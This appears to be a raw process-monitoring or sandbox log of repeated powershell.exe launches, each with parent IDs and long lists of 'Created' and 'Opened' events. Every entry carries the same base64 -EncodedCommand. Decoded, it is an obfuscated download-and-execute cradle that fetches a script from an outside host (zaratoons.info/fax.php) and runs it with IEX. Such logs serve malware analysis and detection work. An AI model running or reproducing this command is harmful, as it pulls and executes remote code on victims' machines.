"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
86
776
powershell.exe
1276
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
87
2488
powershell.exe
1560
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
88
4344
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
89
4420
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
90
4444
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Opened
Opened
Process
91
4484
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
92
4524
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
93
4544
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
94
4616
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Process
95
4648
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
96
4716
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
97
4756
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
98
4796
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
99
4832
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
100
4872
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
101
4924
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
102
4948
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Opened
Opened
Process
103
4972
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Opened
Opened
Process
104
5012
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
105
5084
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Process
106
5112
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
107
4328
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Opened
Opened
Process
108
3252
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Opened
Opened
Opened
Opened
Process
109
3124
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Opened
Opened
Process
110
3088
powershell.exe
944
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
111
4428
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
